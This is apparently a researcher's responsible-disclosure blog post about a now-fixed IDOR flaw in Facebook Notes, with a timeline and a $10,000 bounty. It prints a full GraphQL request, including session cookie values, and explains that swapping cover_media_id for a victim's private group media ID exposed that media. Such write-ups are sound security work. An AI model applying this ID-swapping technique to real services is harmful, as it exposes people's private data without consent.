Hi, This is Raja Sudhakar from Coimbatore, Tamil Nadu. I am freedom security researcher. This post is about a vulnerability I discovered on Facebook which I could view any Facebook Groups Notes media. Facebook acknowledged the issue promptly, fixed it, and rewarded me with a US $10,000 bounty based on the severity and impact of this vulnerability

Facebook that allowed users to write and publish longer-form content, similar to blog posts or articles. It was introduced as a way to share more detailed and substantial content compared to regular status updates or short posts. Facebook Notes allowed users to create rich-text posts with formatting options such as headings, bullet points, images, and hyperlinks.

IDOR (Insecure Direct Object References)

Reference: https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References

POST /api/graphql/ HTTP/2
Host: www.facebook.com
Cookie: sb=AI6rZMwnqkTXORscLvl-6exQ; dpr=2; datr=AI6rZKHF74ih8Kwg3W7AqugP; c_user=100007305343287; wd=1600x881; m_page_voice=100079998952942;
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="__hs"
2
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="__ccg"
15
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="fb_dtsg"
RelayModern
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="fb_api_req_friendly_name"
usePaperCreateDocumentVersionForLexical_Mutation
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="variables"
{"connections":["client:1081791239468083:__PaperDocumentVersionHistoryPanel__documentVersions_connection"],"input":{"client_mutation_id":"16","actor_id":"100007305343287","document_case_id":"1081791239468083","source_payload":{"cover_media_id":"3566344510300190","cover_media_offset_y":0,"media_ids":[],"payload":"{\"root\":{\"children\":[{\"children\":[{\"detail\":0,\"format\":0,\"mode\":\"normal\",\"style\":\"\",\"text\":\"qwerty\",\"type\":\"text\",\"version\":1}],\"direction\":\"ltr\",\"format\":\"\",\"indent\":0,\"type\":\"paragraph\",\"version\":1}],\"direction\":\"ltr\",\"format\":\"\",\"indent\":0,\"type\":\"root\",\"version\":1}}","subtitle":"","title":"Attacker Note"},"version":10}}
------WebKitFormBoundaryQaXTzIDzo6Oayvrz
Content-Disposition: form-data; name="server_timestamps"
true

Replacing the cover_media_id with the victim’s private group media id in the above request led to view victim media.

13 July 2023 at 14:20 : Report sent to Facebook Security team

13 July 2023 at 20:46 : Bug acknowledged by Facebook Security team

19 July 2023 at 17:36 : Vulnerability Fixed

26 July 2023 at 19:54 : Bounty of $10000 awarded by Facebook

Thanks to the Facebook security team for quickly fixing the issue.

Note: This is being published with the permission of Facebook under the responsible disclosure policy. The vulnerability is now fixed.